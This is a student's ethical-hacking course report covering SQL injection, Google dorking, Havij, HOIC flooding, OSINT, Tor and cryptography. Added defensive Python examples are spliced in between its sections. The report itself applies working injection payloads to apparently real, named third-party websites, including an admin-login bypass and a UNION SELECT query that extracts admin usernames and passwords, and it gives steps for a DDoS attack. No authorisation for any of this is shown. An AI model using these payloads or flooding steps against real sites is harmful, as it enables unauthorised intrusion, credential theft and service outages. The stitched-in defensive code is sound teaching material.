
Thesis For Arena


Cyber Security and Ethical Hacking

Submitted by: Mahadi26
Submission date: 15 February 2020

Table of contents

Serial No.  Name of the content                    Page number
1.          Basic SQL Injection                    3
2.          Google Dork                            5
3.          Advanced SQL Injection (using Havij)   7
4.          DDoS Attack                            14
5.          Open Source Intelligence (OSINT)       17
6.          Manual SQL Injection                   21
7.          Dark web, Deep web and Surface web     24
8.          Cryptography                           28

It has not been long since I joined Arena Web Security (AWS), yet it already feels like family. We
are here for a professional ethical hacking course; simply put, I am here out of my passion for
hacking and want to take it up as a profession.
After the admission process we started our journey on 25 January 2020 with an orientation
class. As we were new, the class discussed Basic SQL Injection.

Basic SQL Injection


We know that all of a website's data are stored in a database. To maintain, modify or otherwise
work with that database we use software called a Database Management System (DBMS). If we
gain access to the database, we can obtain any information on the website that the site's admin
did not want to show us; in other words, the site is hacked.
So we have understood that we have to gain access to the database. To do that we use SQL
injection. In a vulnerable website a malicious SQL query is injected as input data, and the database
then accepts and executes it. Now the site is ours.
An example for easy understanding: 1’or’1=’1 is a malicious SQL query. We will inject this
query into a vulnerable website. This is our target website:
http://www.3deducational.co.in/admin/index.php
This is the login page of the target site. We will use 1’or’1=’1 as both the user ID and the
password, as in the pictures below.

Fig.01: Login page
Fig.02: SQL query injection
The query is accepted and executed by the database, and we have the admin panel.
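To see why the query above lets the login through, and what stops it, here is an added example (written for this write-up, not code from the report or from the target site) using Python's built-in sqlite3 module and a constructed admin table with a made-up password. The payload is the report's 1’or’1=’1 with the quotes in their conventional places (1' or '1'='1); the vulnerable function builds the query by string concatenation the way a vulnerable login page does, and the parameterized function is the fix.

```python
import sqlite3

# Constructed in-memory table standing in for a site's admin table.
# The account name and password are made-up sample values, not from the report.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'sample-password')")
    return conn

def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, so a quote in the input
    terminates the literal and the rest of the input becomes SQL syntax."""
    sql = ("SELECT COUNT(*) FROM admin WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0

def login_parameterized(conn, username, password):
    """Uses placeholders: the values never touch the SQL text, so quotes and
    keywords inside them are compared as plain characters."""
    sql = "SELECT COUNT(*) FROM admin WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0

def quote_causes_error(conn):
    """The report's vulnerability check: a lone quote appended to the input.
    Returns True when the concatenated query fails to parse; that database
    error is the 'change on the page' the report looks for, and it is what a
    generic error page should hide."""
    try:
        login_vulnerable(conn, "1'", "x")
    except sqlite3.OperationalError:
        return True
    return False

# The report's payload, with the quotes in their conventional places.
PAYLOAD = "1' or '1'='1"

def demo():
    conn = make_db()
    return {
        "vulnerable_bypassed": login_vulnerable(conn, PAYLOAD, PAYLOAD),
        "parameterized_bypassed": login_parameterized(conn, PAYLOAD, PAYLOAD),
        "parameterized_valid_login": login_parameterized(conn, "admin", "sample-password"),
        "error_on_quote": quote_causes_error(conn),
    }

if __name__ == "__main__":
    print(demo())
```

Run it and the vulnerable login returns True for the payload (the condition becomes username='1' OR '1'='1', which is always true) while the parameterized one returns False, yet still accepts the real credentials. The third function reproduces the single-quote check used later in the report and shows that the visible change is a database syntax error, which is why a login page should never expose raw database errors.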

But there is a question. We injected into a vulnerable website; how do we find a vulnerable site to
inject into in the first place?
For the answer, there comes Google Dork.

Google Dork
At first, we have to know what a vulnerability is.
A vulnerability is a weakness or security hole in a system. A vulnerability in a particular system
means there is some chance of an attack succeeding against it, but it does not guarantee that the
system will be hacked.
There are many ways to find vulnerable websites, and Google Dork is popular among them.
It is an advanced search technique for finding specific information.
Some common Google Dork operators are given and described below:
inurl: finds pages whose URL contains the text that follows; e.g. inurl:”admin.php” .
intitle: finds pages whose title contains the text that follows; e.g. intitle:”control panel” .
intext: finds pages whose body text contains the text that follows; e.g. intext:”education” .
site: restricts results to a specific site; e.g. site:”sourceforge.com” .
cache: shows Google's cached version of a website; e.g. cache:”sourceforge.com” .

allintext: searches for pages whose text contains all of the specified words; e.g. allintext:”educational
sites” .
allinurl: fetches results whose URL contains all of the specified words; e.g.
allinurl: client area .
filetype: searches for files with a given extension; e.g. filetype: txt .

There are many more operators. Now let's try one in practice.

Here .in is the country-code domain of India. Each country has its own domain; the Wikipedia
list linked below gives further information.
https://en.wikipedia.org/wiki/List_of_Internet_top-level_domains

From this we have some idea of basic SQL injection, which is done with a simple SQL query.
We were then introduced to a tool called Havij.
This is an advanced SQL injection tool.

Advanced SQL Injection
The Havij tool is used for advanced SQL injection.
The process is simple. First we need to find a vulnerable site, but in this case it must have a
parameter value in the URL. To find this type of website we search using Google Dork.
Our search query should look like this:
php?id= site: .pk , where .pk is the extension for Pakistani websites. The search results are shown below.

Now we open each site in turn, add a single quote (‘) at the end of the parameter value, press
Enter and observe whether anything on the page changes. If a change appears, the site is
vulnerable to advanced SQL injection; otherwise it is not.

At first the webpage looked like this:

But when we add the quote (‘), this happens:

Yes, there are changes. We spotted changes, which means the site is vulnerable to advanced SQL injection.
Now we open the Havij tool. In the bar named Target we paste the link as it was before we
added the quote.

Now we tap the Analyze button to analyze the target.
After Havij has analyzed the target, we tap the Tables button and then Get Tables.

A list has appeared. We now have access to the site's database.
In that list I will check admin, because I need the admin's login information. You know
why 😊
After checking the admin check box we tap Get Columns.

Here we get some more lists. These are the columns of the table admin. Now I will check
Password and UserName to get their data, then tap Get Data.

This was SQL injection using Havij.

These processes are for gaining access to the target site. But what if I want to take a site down so
that no one can access it? Is there a process for that?
Yes, there is an attack for that. It is called Distributed Denial of Service (DDoS).

DDoS attack
In this attack, incoming traffic floods the target from many different sources, potentially hundreds of
thousands or more. This effectively makes it impossible to stop the attack simply by blocking a
single IP address; it is also very difficult to distinguish legitimate user traffic from attack traffic
when it is spread across so many points of origin.
There are many types of DDoS attacks. Common types include the following:

• Traffic attacks: Traffic flooding attacks send a huge volume of TCP, UDP and ICMP
packets to the target. Legitimate requests get lost, and these attacks may be accompanied by
malware exploitation.
• Bandwidth attacks: This kind of DDoS attack overloads the target with massive amounts of
junk data. This results in a loss of network bandwidth and equipment resources and can
lead to a complete denial of service.
• Application attacks: Application-layer messages can deplete resources in the
application layer, leaving the target's system services unavailable.

There are many tools to perform a DDoS attack; we used High Orbit Ion Cannon (HOIC) to
perform the attack.
This is the app's layout:

Here at the bottom right corner we see two signs, plus and minus. When we want to perform an
attack, we tap the plus icon and a new window appears.

The target website's URL is pasted into the URL field, and then we tap FIRE THE
LAZER! This is the way of performing a DDoS attack using HOIC.

Open source intelligence (OSINT)
This is the process of analyzing information gathered from public sources. It has various
effective applications. The OSINT framework is mostly used by security researchers and penetration
testers for digital footprinting, intelligence gathering and reconnaissance. There are two common
use cases for OSINT:
1. Ethical Hacking and Penetration Testing:
Security professionals use it to identify potential weaknesses, which include:
• Accidental leaks of sensitive information, for example through social media.
• Open ports or unsecured internet-connected devices.
• Unpatched software, such as websites running old versions of common CMS products.
• Leaked or exposed assets.

2. Identifying External Threats:

Security professionals prioritize their time and resources to address the most significant current
threats. For example:
• In most cases, this type of work requires an analyst to identify and correlate multiple data
points to validate a threat before action is taken. For example, while a single threatening
tweet may not be cause for concern, that same tweet would be viewed in a different light
if it were tied to a threat group known to be active in a specific industry.

The OSINT technique is simple. Whatever information we gather from public sources, we try to
verify from the internet. For this verification the raw material is examined with different tools, which
are available online. Some of them are mentioned here.
Domain Big Data is used to find who the owner of the target site is, along with the owner's address,
contact information and other details.
https://domainbigdata.com/
Useful information about http://www.comillarkagoj.com/ obtained using the domainbigdata site:

If we have a photo and need to analyze it for any kind of information, such as a hidden logo or message
in the picture, we can use this site:
https://29a.ch/photo-forensics/?fbclid=IwAR0mu7yRhzogKc0Fntgm6-VrrYibC414uPZoN7csgTcc9t7ifOuKh_Pc39Y#forensic-magnifier

Sometimes we have to mirror the target image to examine it; then we can use this site to mirror the
image:

https://www5.lunapic.com/editor/?action=mirror&fbclid=IwAR19Cw6SiInGbwcUlzKor5iOMxXfCFd0NoFmBug1Gk13GYv274rm7UgRcBs

Another important topic related to OSINT is Metadata.

Metadata
Metadata is data about other data. It is summary information about the data under examination, by
which we can track or investigate an event. It can take any form, such as voice conversations, text
messages or social media communication data.
Metadata provides a means to classify, organize and characterize data or content. The National
Information Standards Organization (NISO) provides a taxonomy that can be applied to all kinds
of data, from libraries to web sites, for textual and non-textual data, in digitized or physical
form.
NISO describes three types of metadata [1].
• Descriptive metadata:
It includes information such as points of contact, the title or author of a publication, an abstract
of a work, keywords used in a work, a geographic location, or even an explanation of
methodology.
• Structural metadata:
It explains how a resource is composed or organized. A digitized book, for example, can be
published as individual page images, PDF or HTML files.
• Administrative metadata:
Information used to manage a resource.
To find a picture's metadata we can go to https://fotoforensics.com/, where we get the required
information.

Manual SQL Injection
This is one of the important topics in hacking. With Havij we did it automatically; here we
will do it by ourselves.
The process is similar. First we find a vulnerable website with Google Dork. When a
vulnerable website is found, the injection process begins.
Our target site is http://ewe.co.in/career.php?id=1
We know the data is stored on the server in rows and columns, so we have to find the number of
columns the data is stored in.
To do that we can write the query in two ways:
• Integer type
• String type
This is the integer type:
The URL: http://ewe.co.in/career.php?id=1 order by 1-- , then 2, then 3, then 4 and so on; for each
number the page will show data until it gives an error. The number just before the one that produces
the error is the number of columns.

This is the string type:
The URL: http://ewe.co.in/career.php?id=1’ order by 1--+
Following this process we found that this site's query has 14 columns.

Now, to find the vulnerable columns, we write:

The URL: http://ewe.co.in/career.php?id=-1'+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+
and press execute.
Now some of the values show up in the web page. Those are the vulnerable columns.

Now we take a random column number from the displayed values; we are taking 8.
To get the full data, we remove 8 and in its place we use→ union base➔Dios mysql➔dios by Zen
wav

Everything has been displayed on the site.
To get the admin data from there we write:
http://ewe.co.in/career.php?id=-1'+UNION+ALL+SELECT+1,2,group_concat(UserName,0x3d3d,Password),4,5,6,7,8,9,10,11,12,13,14 from admin--+
And the data we wanted has been found.
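For the defender's side of this procedure, here is an added example (not part of the report) that turns the three steps above, ORDER BY column counting, UNION SELECT column discovery and group_concat extraction, into detection rules run over constructed access-log lines. The path /item.php, the id parameter and the addresses are made up; only Python's standard library is used. Every request target is URL-decoded before matching, because the probes arrive encoded (%27, +) exactly as in the URLs above.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Patterns matched against the URL-decoded, lower-cased query string. Each one
# corresponds to a step described in the report: column counting with ORDER BY,
# UNION SELECT to find displayed columns, and group_concat to pull table rows.
PROBE_PATTERNS = [
    ("order-by column count", re.compile(r"\border\s+by\s+\d+")),
    ("union select", re.compile(r"\bunion\b[\s\w]*\bselect\b")),
    ("group_concat extraction", re.compile(r"\bgroup_concat\s*\(")),
    ("quote after numeric id", re.compile(r"=-?\d+'")),
    ("sql comment terminator", re.compile(r"--")),
]

def classify_request(request_target):
    """Return the names of the probe signatures found in one request target,
    e.g. '/item.php?id=1%27+order+by+1--+'. An empty list means nothing matched."""
    query = urlsplit(request_target).query
    decoded = unquote_plus(query).lower()
    return [name for name, pat in PROBE_PATTERNS if pat.search(decoded)]

# Client address and request target out of a Common Log Format line.
CLF_REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_log(lines):
    """Run the classifier over access-log lines and return (ip, target, hits)
    for every line that looks like an injection probe."""
    findings = []
    for line in lines:
        m = CLF_REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.group(1), m.group(2)
        hits = classify_request(target)
        if hits:
            findings.append((ip, target, hits))
    return findings

# Constructed sample lines; the path, parameter name and addresses are made up.
SAMPLE_LINES = [
    '203.0.113.9 - - [15/Feb/2020:11:02:10 +0000] "GET /item.php?id=1 HTTP/1.1" 200 811',
    '203.0.113.9 - - [15/Feb/2020:11:02:31 +0000] "GET /item.php?id=1%27+order+by+1--+ HTTP/1.1" 500 230',
    '203.0.113.9 - - [15/Feb/2020:11:03:05 +0000] "GET /item.php?id=-1%27+UNION+ALL+SELECT+1,2,3--+ HTTP/1.1" 200 802',
    '198.51.100.4 - - [15/Feb/2020:11:03:40 +0000] "GET /item.php?id=2 HTTP/1.1" 200 790',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LINES):
        print(finding)
```

The two probe lines are flagged with the step they belong to; the two normal requests are not. The 500 status on the ORDER BY line is the same error signal the report watches for, so pairing these rules with server error rates gives a second, pattern-free indicator. The real fix for the id parameter is the one from the login example: validate it as an integer and pass it as a query parameter, so that neither a quote nor ORDER BY ever reaches the SQL text.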

Now we will learn about the Dark web and the Tor Browser.

Dark web, Deep web and Surface web
In everyday life we use the internet. We can find almost everything on it, and we may think
this internet has no limit; it is a huge area. But this regular internet is only a small portion of the actual
internet. This small portion is called the surface web.

This picture shows the actual situation.
We can surf the surface web with our regular browsers. But how do we surf the deep and dark
web?
The answer is the Tor Browser. This browser has some valuable features [2].
• It does not track its users.
• It hides the user's actual IP address.
• Cross-platform availability: the application is available for Linux, Windows and
Mac.
• Complex data encryption before data is sent over the Internet.
• Automatic data decryption at the client side.
• It is a combination of the Firefox browser and the Tor Project.
• It provides anonymity to servers and websites.
• It makes it possible to visit blocked websites.
• Performs tasks without revealing the IP of the source.
• Capable of routing data to/from hidden services and applications behind a firewall.
• Portable: run a pre-configured web browser directly from a USB storage device, with no
need to install it locally.
• Available for the x86 and x86_64 architectures.
• Easy to set up FTP through Tor by configuring it as a “socks4a” proxy on “localhost” port
“9050”.
• Tor is capable of handling thousands of relays and millions of users.

Web surfing with Tor looks more like this.

We can see more relays. This has a benefit and a drawback. The benefit is that there is no third-party
software, such as a VPN, that could betray our information; this comes from the extra relays. The
drawback is that they slow down surfing speed. But if it is a question of security, then Tor is number one.

Dark web links are not like surface web links. Dark web links are hashed: long strings of random
characters that cannot be memorized. Here is a surface web link providing dark web links.
https://www.thedarkweblinks.com/

If we open any of these we see this:

The red-marked words are the links; we just need to copy the link, paste it into the Tor
browser and add the .onion extension, because the Tor browser uses this extension.

Now, for the security of personal data during communication, data should be encrypted,
and this practice is called cryptography.

Cryptography

Cryptography refers to secure information and communication techniques derived from
mathematical concepts and a set of rule-based calculations called algorithms, which transform
messages in ways that are hard to decipher. These deterministic algorithms are used for
cryptographic key generation and digital signing to protect data privacy, web browsing on the
internet and confidential communications such as credit card transactions and email.
There are three types of cryptography [3].
• Symmetric-key:
Encryption algorithms create a fixed length of bits known as a block cipher with a secret key that
the creator uses to encipher data (encryption) and the receiver uses to decipher it. Types of
symmetric-key cryptography include the Advanced Encryption Standard (AES).
• Asymmetric-key:
Encryption algorithms use a pair of keys, a public key associated with the creator for encrypting
messages and a private key that only the originator knows for decrypting that information.
• Hash function:
It returns a deterministic output from an input value and is used to map data to a fixed size.
MD5 is a cryptographic hash function. To hash any data with MD5 we can go to this site
http://www.md5-creator.com/

To look up the original value of an MD5 hash we can go to this site
https://www.md5online.org/md5-decrypt.html
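An added example (not from the report and not from either site named above) showing what those two sites actually do: the first computes an MD5 digest, and the second looks the digest up in a table of inputs that were hashed in advance. That is why a short or common input comes back instantly while nothing is really decrypted, since a hash has no key to undo it. The block also shows the defender's answer for stored passwords, a salted and deliberately slow hash (PBKDF2-HMAC-SHA256 from Python's hashlib), against which such a table is useless. The wordlist is a constructed sample standing in for the much larger tables such sites hold.

```python
import hashlib
import hmac
import os

def md5_hex(text):
    """MD5 of a UTF-8 string, as the hash-creator site would show it."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()

def build_lookup(candidates):
    """What an online 'MD5 decrypt' service really is: a table from
    precomputed digests back to their inputs."""
    return {md5_hex(c): c for c in candidates}

def lookup_md5(digest, table):
    """Return the original input if its MD5 was precomputed, else None."""
    return table.get(digest.lower())

def hash_password(password, salt=None, iterations=200_000):
    """Salted, slow hash for storing passwords. A random salt per user means
    identical passwords get different digests, so a precomputed table no
    longer applies, and the iteration count makes each guess expensive."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt.hex() + "$" + digest.hex()

def verify_password(password, stored, iterations=200_000):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), iterations)
    return hmac.compare_digest(digest.hex(), digest_hex)

# Constructed wordlist; real lookup services hold billions of such entries.
SAMPLE_WORDLIST = ["password", "123456", "letmein", "arena2020"]

def demo():
    table = build_lookup(SAMPLE_WORDLIST)
    weak = md5_hex("letmein")          # unsalted MD5, as the first site produces
    strong = hash_password("letmein")  # salted PBKDF2 record for the same input
    return {
        "md5_of_letmein": weak,
        "lookup_hit": lookup_md5(weak, table),
        "lookup_miss": lookup_md5(md5_hex("not-in-the-list-7f3"), table),
        "salted_verifies": verify_password("letmein", strong),
        "salted_rejects_wrong": verify_password("letmeout", strong),
        "salted_in_md5_table": strong in table,
    }

if __name__ == "__main__":
    print(demo())
```

The lookup returns "letmein" for its MD5 because that word was in the table, and None for a value that was not; the salted record verifies the right password, rejects a wrong one, and never appears in an MD5 table because every user gets a fresh salt. The same reasoning is why MD5 should not be used for passwords at all: it is fast and unsalted, which is exactly what makes the lookup site work.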

References

[1] https://gadgetopia.com/post/7881
[2] https://www.tecmint.com/tor-browser-for-anonymous-web-browsing/
[3] https://searchsecurity.techtarget.com/definition/cryptography

